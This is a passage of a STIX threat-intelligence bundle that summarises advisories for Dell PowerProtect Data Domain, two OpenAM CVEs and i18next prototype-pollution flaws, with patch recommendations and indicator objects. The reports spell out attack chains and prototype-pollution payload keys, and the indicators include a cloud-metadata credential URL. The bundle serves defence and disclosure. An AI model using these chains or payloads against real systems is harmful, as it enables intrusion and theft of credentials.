      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2f4ebb76-1c25-50e7-a057-7a820d937e64",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2fc57edd-0a75-571f-9990-bd43289f97cf",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--960f50db-e8a7-5e66-9e80-61d82e25aeaf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2fc57edd-0a75-571f-9990-bd43289f97cf",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--44407081-63d7-56e6-a78f-b98928d21c0b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2fc57edd-0a75-571f-9990-bd43289f97cf",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2ab7e7a2-c156-53bb-a3e9-9e1ec7997683",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2fc57edd-0a75-571f-9990-bd43289f97cf",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e8759f3a-36e8-5dcc-a5bd-19955068c1de",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2fc57edd-0a75-571f-9990-bd43289f97cf",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--08034fb1-a440-5817-bcb0-e93e68f47ade",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Automated Exfiltration",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1020",
          "url": "https://attack.mitre.org/techniques/T1020"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--35515661-2474-5125-b14b-cb47662e64fd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2fc57edd-0a75-571f-9990-bd43289f97cf",
      "target_ref": "attack-pattern--08034fb1-a440-5817-bcb0-e93e68f47ade"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2fc57edd-0a75-571f-9990-bd43289f97cf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Dell PowerProtect Data Domain: Multiple Vulnerabilities",
      "description": "## Overview\n\nThe German Federal Office for Information Security (BSI) has issued an advisory (WID-SEC-2026-2189) highlighting multiple critical vulnerabilities within Dell PowerProtect Data Domain. These vulnerabilities collectively pose a significant risk, allowing an attacker to achieve a wide range of malicious outcomes. While the advisory does not specify observed in-the-wild exploitation, it warns that successful exploitation could lead to privilege escalation, arbitrary code execution, bypassing security measures, Denial of Service (DoS) attacks, Cross-Site Scripting (XSS), and unauthorized information disclosure or file manipulation. Organizations utilizing Dell PowerProtect Data Domain systems are urged to address these vulnerabilities promptly, as they represent a substantial attack surface for adversaries seeking to compromise data backup and recovery infrastructure.\n\n## Impact\n\nSuccessful exploitation of these vulnerabilities in Dell PowerProtect Data Domain could lead to severe consequences for affected organizations. Attackers could gain elevated privileges, execute arbitrary code on the affected systems, and bypass existing security controls, potentially leading to full compromise of the data protection environment. The vulnerabilities also open avenues for Denial of Service attacks, rendering critical backup and recovery services unavailable, and Cross-Site Scripting attacks that could compromise administrative sessions. Furthermore, sensitive information could be disclosed, and critical files manipulated, undermining data integrity and confidentiality. While no specific victim count or targeted sectors were detailed in the advisory, any organization using Dell PowerProtect Data Domain is at risk of these potential impacts.\n\n## Recommendation\n\n*   Prioritize and immediately apply all available security patches and updates for Dell PowerProtect Data Domain from Dell Technologies.\n*   Regularly review security advisories from Dell and CERT-Bund (BSI) for new vulnerabilities affecting Dell PowerProtect Data Domain.\n",
      "published": "2026-07-03T10:55:50Z",
      "labels": [
        "vulnerability",
        "server",
        "dell",
        "data-protection"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--08034fb1-a440-5817-bcb0-e93e68f47ade"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2189"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation of Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b8ebc980-bedb-51e6-9229-ed784ca0c5cb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--aa203fcc-49fd-58a4-8ba6-9c90b75b0557",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0d3d906c-53f9-5134-abb6-0e56395fbbe1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--aa203fcc-49fd-58a4-8ba6-9c90b75b0557",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--aa203fcc-49fd-58a4-8ba6-9c90b75b0557",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenAM Pre-Auth RCE via WebAuthn Java Deserialization (CVE-2026-45051)",
      "description": "## Overview\n\nA critical security vulnerability, CVE-2026-45051, has been disclosed in OpenAM Community Edition affecting versions up to 16.0.6. The flaw resides in the WebAuthn authentication module, specifically within the `openam-auth-webauthn` component, and is categorized as a deserialization of untrusted data (CWE-502). This vulnerability can lead to pre-authentication arbitrary code execution (RCE) in the context of the application server. Exploitation requires a specific pre-condition: an attacker must first be able to write attacker-controlled serialized Java objects to a user's storage attribute that is subsequently read by the WebAuthn module. While this is not the default configuration, it is feasible in deployments where the storage attribute is made user-writable through misconfiguration or other vulnerabilities. The vulnerability has been addressed in OpenAM Community Edition version 16.1.1.\n\n## Attack Chain\n\n1.  **Initial Compromise/Pre-condition fulfillment**: An attacker gains the ability to write arbitrary data to an OpenAM user's storage attribute. This could occur through various means such as abusing delegated administration privileges, gaining write access to the backing LDAP/directory user record, exploiting a separate vulnerability like legacy REST self-registration, or due to an unsafe reconfiguration of the `userAttribute` to an attacker-writable string attribute.\n2.  **Payload Injection**: The attacker crafts a malicious serialized Java object (gadget payload) specifically designed for arbitrary code execution on the application server.\n3.  **Data Modification**: The attacker leverages their acquired write access to modify a target user's storage attribute within OpenAM, embedding the crafted serialized Java object as the attribute's value.\n4.  **Authentication Flow Initiation**: The attacker initiates a WebAuthn authentication flow, either by attempting to authenticate as the modified user or by triggering any process within OpenAM that involves the retrieval and processing of the modified user's WebAuthn-related data.\n5.  **Vulnerable Deserialization**: OpenAM's WebAuthn module, while processing the authentication flow, attempts to deserialize the content of the compromised storage attribute, which now contains the attacker's malicious serialized Java object.\n6.  **Code Execution**: During the deserialization process, the malicious Java gadget payload embedded within the storage attribute is executed by the underlying Java Virtual Machine on the OpenAM application server, resulting in arbitrary code execution with the privileges of the application server user.\n\n## Impact\n\nIf successfully exploited, CVE-2026-45051 grants an attacker arbitrary code execution on the OpenAM application server. This means an attacker could completely compromise the identity management system, gaining control over user accounts, accessing sensitive information, manipulating authentication processes, or establishing persistent access within the targeted organization's network. While the vulnerability requires a pre-condition where a storage attribute becomes user-writable (which is not the default), the product allows administrators to configure this attribute freely without warnings or enforcement, making such misconfigurations feasible in real-world deployments. The impact extends to all data and systems relying on the compromised OpenAM instance for authentication and authorization.\n\n## Recommendation\n\n*   Immediately update OpenAM Community Edition to version 16.1.1 or later to patch CVE-2026-45051.\n*   Review OpenAM configurations to ensure that the WebAuthn user storage attribute is not set to an attacker-writable string attribute and is managed only by server-side processes.\n*   Scrutinize all administrative access and delegated administration privileges to prevent unauthorized modification of user attributes.\n*   Implement rigorous logging and monitoring for attempts to modify user attributes, especially those related to WebAuthn, within OpenAM and its backing directories (e.g., LDAP).\n",
      "published": "2026-07-03T10:48:07Z",
      "labels": [
        "deserialization",
        "RCE",
        "OpenAM",
        "WebAuthn",
        "CVE",
        "application-exploitation"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-6c99-87fr-6q7r"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--25afa4dd-c9a7-5743-b57b-aef47ba91d77",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--63072b18-f1b0-5b23-8792-8af4f2d6a0e8",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d7cc9c68-4eff-595c-92a0-dea8fe873626",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--63072b18-f1b0-5b23-8792-8af4f2d6a0e8",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--63072b18-f1b0-5b23-8792-8af4f2d6a0e8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenAM Pre-auth User Profile Tampering via Anonymous SOAP Authn in Liberty IDPP/Discovery Endpoints (CVE-2026-45052)",
      "description": "## Overview\n\nA critical improper authorization vulnerability (CVE-2026-45052) has been identified in OpenAM Community Edition, affecting versions through 16.0.6. This flaw resides within the Liberty Web Services SOAP receiver, specifically in its IDPP/Discovery Endpoints. An unauthenticated remote attacker can exploit this vulnerability to perform anonymous writes of persistent entries into the Liberty Discovery store. These malicious writes can target any user's LDAP entry or a shared root-realm Discovery branch. The exploit bypasses standard LDAP and identity Access Control Lists (ACLs) because the server-side Discovery handlers process these requests with elevated internal privileges, explicitly utilizing an internal admin token. This vulnerability, stemming from a legacy protocol (Liberty ID-WSF), allows attackers to manipulate core identity data, with potential downstream impacts on service routing or security mechanism selection in deployments that consume this Discovery data. The issue was patched in OpenAM Community Edition version 16.1.1.\n\n## Attack Chain\n\n1.  **Target Identification**: An unauthenticated remote attacker identifies an internet-facing OpenAM Community Edition instance running a vulnerable version (\u003c= 16.0.6) that exposes the Liberty Web Services SOAP endpoint.\n2.  **Endpoint Discovery**: The attacker discovers the vulnerable Liberty IDPP/Discovery SOAP endpoint.\n3.  **Malicious Request Crafting**: The attacker crafts a specially designed SOAP request containing data intended to be written persistently into OpenAM's identity store.\n4.  **Unauthorized Request Submission**: The attacker submits the crafted SOAP request to the vulnerable Liberty IDPP/Discovery endpoint without requiring any authentication.\n5.  **Privilege Escalation (Internal)**: The vulnerable OpenAM server receives the unauthenticated request, and its Liberty Discovery handlers process it using an internal admin token, effectively operating with elevated privileges.\n6.  **Data Tampering and Persistence**: The server-side process bypasses normal LDAP and identity ACLs, successfully writing the attacker's specified persistent entries into the Liberty Discovery store, targeting either a user's LDAP entry or a shared root-realm Discovery branch.\n7.  **Impact on Service Routing/Security**: If downstream systems actively consume Liberty discovery data, these manipulated records could subsequently influence service routing decisions or compromise security mechanism selections, potentially leading to unauthorized access, bypass of authentication, or denial of service.\n\n## Impact\n\nOpenAM Community Edition deployments up to version 16.0.6 that have the Liberty Web Services component exposed are severely impacted. An unauthenticated attacker can leverage this vulnerability to inject persistent, unauthorized data into critical identity stores. This includes the ability to modify user LDAP entries and global Discovery branches. Because these writes occur with elevated internal privileges and bypass normal access controls, they represent a significant compromise of the identity management system. In environments where Liberty discovery data is actively utilized, such manipulated records could directly influence how services are routed or how security mechanisms operate, potentially leading to widespread unauthorized access, service disruption, or other severe security compromises across the affected enterprise.\n\n## Recommendation\n\n*   Immediately patch OpenAM Community Edition instances to version 16.1.1 or later to remediate CVE-2026-45052.\n*   Review and ensure that the Liberty Web Services component is not exposed unnecessarily, especially if not actively used.\n*   Consider implementing network segmentation or access control lists to restrict access to OpenAM's administrative and critical endpoints to trusted sources only.\n",
      "published": "2026-07-03T10:47:14Z",
      "labels": [
        "vulnerability",
        "identity-management",
        "web-application",
        "openam"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-p462-xxwx-pqf4"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--965895d5-02ec-56b3-9b5d-c82c73240894",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d56a892c-bd47-5a3a-a5d0-c7e316285f95",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1b560b4d-0cb6-55c0-ac6c-131148d9c0a0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d56a892c-bd47-5a3a-a5d0-c7e316285f95",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d56a892c-bd47-5a3a-a5d0-c7e316285f95",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "i18next-http-middleware Prototype Pollution via missingKeyHandler (CVE-2026-48714)",
      "description": "## Overview\n\nA critical prototype pollution vulnerability, identified as CVE-2026-48714, affects `i18next-http-middleware` versions 3.9.6 and earlier. This flaw specifically impacts the `missingKeyHandler`, which is designed to process keys for missing translations. While previous versions introduced denylists for literal unsafe keys like `__proto__`, this vulnerability arises because the handler failed to block dotted variants, such as `\"__proto__.polluted\"`. When applications expose this `missingKeyHandler` to untrusted user input and are combined with vulnerable backend packages like `i18next-fs-backend` versions 2.6.5 or earlier, an attacker can exploit this oversight. The `keySeparator` (default `.`) within these backends splits the malicious key, passing it to an unguarded `setPath()` function that then directly writes to `Object.prototype`. Successful exploitation can lead to severe consequences including application crashes, corrupted translation behavior, configuration poisoning, and bypasses of property-based security checks, with potential for remote code execution. Patches are available in `i18next-http-middleware 3.9.7` and `i18next-fs-backend 2.6.6`.\n\n## Attack Chain\n\n1.  **Reconnaissance \u0026 Target Identification**: An attacker identifies a web application utilizing `i18next-http-middleware` and `i18next-fs-backend` with an exposed `missingKeyHandler` endpoint that accepts untrusted input.\n2.  **Vulnerability Confirmation**: The attacker sends test requests to confirm the application's response to various keys, probing for the behavior of the `missingKeyHandler`.\n3.  **Craft Malicious Request**: The attacker crafts a specially designed HTTP POST request targeting the exposed `missingKeyHandler` endpoint, including a malicious key in the request body, such as `\"__proto__.polluted=value\"`.\n4.  **Handler Processing**: The `i18next-http-middleware` receives the request and passes the malicious key to its `missingKeyHandler` function.\n5.  **Key Segmentation**: Inside the `missingKeyHandler` (or the downstream backend), the configured `keySeparator` (typically `.`) splits the `\"__proto__.polluted\"` key into segments.\n6.  **Prototype Pollution**: The segmented key, including `__proto__`, is then passed to an unguarded `setPath()` function within `i18next-fs-backend` or a similarly affected backend, which inadvertently writes a new property onto `Object.prototype`.\n7.  **Application Impact**: The modified `Object.prototype` pollutes the global object, leading to unexpected application behavior, crashes, configuration poisoning, or the bypass of security checks, potentially enabling further remote execution or data exfiltration.\n\n## Impact\n\nThis vulnerability directly impacts applications that leverage `i18next-http-middleware` with an exposed `missingKeyHandler` to untrusted inputs, specifically when paired with `i18next-fs-backend` versions up to 2.6.5. Successful exploitation allows attackers to perform remote prototype pollution, enabling them to inject arbitrary properties into `Object.prototype`. The observed damage can range from application crashes and corrupted translation functionality to critical configuration poisoning and the bypass of property-based security controls. Depending on the specific application logic, this can escalate to full remote code execution, granting attackers control over the compromised system and access to sensitive data.\n\n## Recommendation\n\n*   **Patch CVE-2026-48714**: Immediately upgrade `i18next-http-middleware` to version 3.9.7 or later to address CVE-2026-48714.\n*   **Patch Companion Vulnerability**: Upgrade `i18next-fs-backend` to version 2.6.6 or later, as it contains a root-cause fix for companion advisory GHSA-2933-q333-qg83.\n*   **Restrict Access to `missingKeyHandler`**: If immediate patching is not possible, mount the `missingKeyHandler` behind authentication or remove the route entirely to prevent untrusted users from accessing it.\n*   **Implement Request Filtering**: Add a request-body filter ahead of the `missingKeyHandler` to reject any top-level key containing `__proto__`, `constructor`, or `prototype` after splitting on the configured `keySeparator`.\n*   **Disable Missing-Key Persistence**: When accepting writes from untrusted input, disable missing-key persistence by setting `saveMissing: false` in your i18next configuration.\n*   **Deploy Sigma Rules**: Deploy the provided Sigma rule to your SIEM to detect attempts at exploiting CVE-2026-48714 via the `missingKeyHandler` endpoint.\n",
      "published": "2026-07-03T10:46:14Z",
      "labels": [
        "web-vulnerability",
        "prototype-pollution",
        "npm",
        "nodejs"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-f49m-vf83-692w"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/i18next/i18next-fs-backend/security/advisories/GHSA-2933-q333-qg83"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--517248b1-d4fc-5036-8dc2-ec5212cde072",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cbf6bfe5-19fd-5b64-8c61-f7a381753417",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cbf6bfe5-19fd-5b64-8c61-f7a381753417",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "i18next-fs-backend Prototype Pollution via Crafted Missing-Key String (CVE-2026-48713)",
      "description": "## Overview\n\nVersions of the `i18next-fs-backend` Node.js package prior to 2.6.6 are susceptible to a critical prototype pollution vulnerability, identified as CVE-2026-48713. This flaw arises when the backend is configured to persist missing translation keys, especially when exposed to untrusted user input via components like `i18next-http-middleware`'s `missingKeyHandler`. An attacker can craft a missing-key string, such as `\"__proto__.polluted\"`, which exploits the package's `keySeparator` splitting logic. This allows the internal `setPath()` function to write arbitrary properties directly onto the global `Object.prototype`, effectively polluting the object. This server-side vulnerability can lead to severe consequences, including application crashes, corrupted translation behavior, configuration poisoning, and potential bypasses of property-based security checks. The vulnerability impacts any Node.js application utilizing the affected versions under the specified configuration.\n\n## Attack Chain\n\n1.  An attacker sends a malicious HTTP request to a web application endpoint that exposes `i18next-http-middleware`'s `missingKeyHandler` to untrusted users.\n2.  The request body or query parameter contains a specially crafted missing-key string, such as `__proto__.polluted=value` or `constructor.polluted=value`.\n3.  The `i18next-fs-backend` (version ≤ 2.6.5) receives this malicious key string for processing and persistence.\n4.  The `Backend.writeFile()` function attempts to process the key and splits it using the configured `keySeparator` (defaulting to `.`), generating an array of segments like `[\"__proto__\", \"polluted\"]`.\n5.  An internal path traversal helper, `getLastOfPath()` in `lib/utils.js`, is called to walk these segments.\n6.  Due to the lack of proper validation or guarding against unsafe segments, this walker successfully traverses into `Object.prototype`.\n7.  The `polluted` property (or similar) is then created or overwritten on the global `Object.prototype` with the attacker-controlled `value`, achieving prototype pollution.\n8.  Subsequent application code that accesses properties on objects without specific checks can be affected by the polluted prototype, leading to application crashes, configuration manipulation, or security bypasses.\n\n## Impact\n\nThe successful exploitation of CVE-2026-48713 can have critical consequences for affected Node.js applications. By injecting arbitrary properties into `Object.prototype`, attackers can cause application crashes by corrupting expected object structures, manipulate application configuration settings to alter behavior or gain control, or bypass security checks that rely on specific property values. While no specific victim counts are provided, any Node.js application using `i18next-fs-backend` \u003c= 2.6.5 in combination with an exposed `missingKeyHandler` or similar untrusted input path is at risk. The impact extends across various sectors, particularly those using Node.js for web development and internationalization.\n\n## Recommendation\n\n*   Immediately upgrade `i18next-fs-backend` to version 2.6.6 or higher to patch CVE-2026-48713.\n*   Upgrade `i18next-http-middleware` to version 3.9.7 or higher, as it contains a companion defense-in-depth fix.\n*   If immediate upgrades are not feasible, ensure the `missingKeyHandler` endpoint of `i18next-http-middleware` is not exposed to untrusted users (e.g., place it behind authentication or remove the route).\n*   Disable missing-key persistence (`saveMissing: false`) if accepting writes from untrusted input in your `i18next` configuration.\n*   As a workaround, set `keySeparator: false` in your `i18next` options to prevent backend key splitting, noting this will also disable legitimate nested translation keys.\n*   Deploy the Sigma rule provided in this brief to your SIEM for detection of exploitation attempts via web server logs.\n",
      "published": "2026-07-03T10:45:06Z",
      "labels": [
        "prototype-pollution",
        "node.js",
        "web-application",
        "vulnerability"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-2933-q333-qg83"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-f49m-vf83-692w"
        }
      ],
      "confidence": 95
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ae965e64-dec6-5039-af48-dc85ad92dd56",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 169.254.169.254",
      "pattern": "[ipv4-addr:value = '169.254.169.254']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:43:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cfe927c9-29b5-5be2-b534-2a83cd0c905f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2cd9c53f-628d-5661-a05a-be50af0d5cb7",
      "target_ref": "indicator--ae965e64-dec6-5039-af48-dc85ad92dd56"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c95474da-e217-5dd8-8a4b-edf850f986ec",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: http://169.254.169.254/latest/meta-data/iam/security-credentials/lemur-acme-role",
      "pattern": "[url:value = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/lemur-acme-role']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:43:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cf26db7b-2002-50df-a45d-28b6a828f3a7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2cd9c53f-628d-5661-a05a-be50af0d5cb7",
      "target_ref": "indicator--c95474da-e217-5dd8-8a4b-edf850f986ec"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--67400db3-af52-574f-b95e-fa222ec07c3b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "email: attacker@evil.example",
      "pattern": "[email-addr:value = 'attacker@evil.example']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:43:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ca9b123a-e960-59aa-88b9-e893254e8170",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
